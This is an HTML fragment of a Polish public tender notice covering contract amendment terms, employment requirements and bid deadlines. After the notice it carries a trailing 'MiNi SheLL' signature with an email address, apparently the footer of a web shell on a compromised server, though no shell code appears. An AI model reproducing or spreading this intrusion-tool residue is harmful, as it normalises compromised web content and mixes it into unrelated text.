class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie dopuszczalne zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności. <br/>2.	Zamawiający przewiduje możliwość dokonania zmian umowy, w następujących przypadkach:<br/>1)	w przypadku zmiany przepisów prawa – dopuszczalna jest taka zmiana umowy, która umożliwi dostosowanie postanowień umowy do nowych przepisów prawa,<br/>2)	wystąpienia zmiany terminu zakończenia robót w związku z:<br/>a)	opóźnieniami wynikającymi z okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,<br/>b)	brakiem możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych,<br/>c)	działaniem siły wyższej, <br/>d)	wstrzymaniem prac przez właściwy organ z przyczyn niezawinionych przez Wykonawcę,<br/>e)	koniecznością wykonania zamówień zamiennych,<br/>f)	innych uzasadnionych przyczyn niezależnych od Wykonawcy.<br/>3)	z przyczyn niezależnych od Wykonawcy wystąpiła konieczność zwiększenia lub zaniechania części robót w stosunku do opisanych w § 1 ust. 1 i 2.<br/>3.	Jeżeli zmiana terminu, o której mowa w ust. 2 pkt 2, spowoduje udokumentowaną zmianę kosztów Wykonawcy, Zamawiający po ocenie wniosku i dokumentów złożonych przez Wykonawcę może zmienić wysokość wynagrodzenia Wykonawcy.<br/>4.	Jeżeli zmiana zakresu przedmiotu umowy, o której mowa w ust. 2 pkt 3, spowoduje udokumentowaną zmianę kosztów Wykonawcy, Zamawiający po ocenie wniosku i dokumentów złożonych przez Wykonawcę może zmienić wysokość wynagrodzenia Wykonawcy. Zmiana może polegać odpowiednio na zwiększeniu lub zmniejszeniu wynagrodzenia Wykonawcy. Kwota zwiększenia wynagrodzenia zostanie ustalona stosownie do zakresu, o jaki zwiększy się przedmiot umowny i może być ustalona na podstawie cen jednostkowych wskazanych w wykazie stanowiącym załącznik do harmonogramu rzeczowo-finansowego. Kwota zmniejszenia wynagrodzenia zostanie ustalona na podstawie cen jednostkowych wskazanych w wykazie stanowiącym załącznik do harmonogramu rzeczowo-finansowego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://otwock.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-09 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com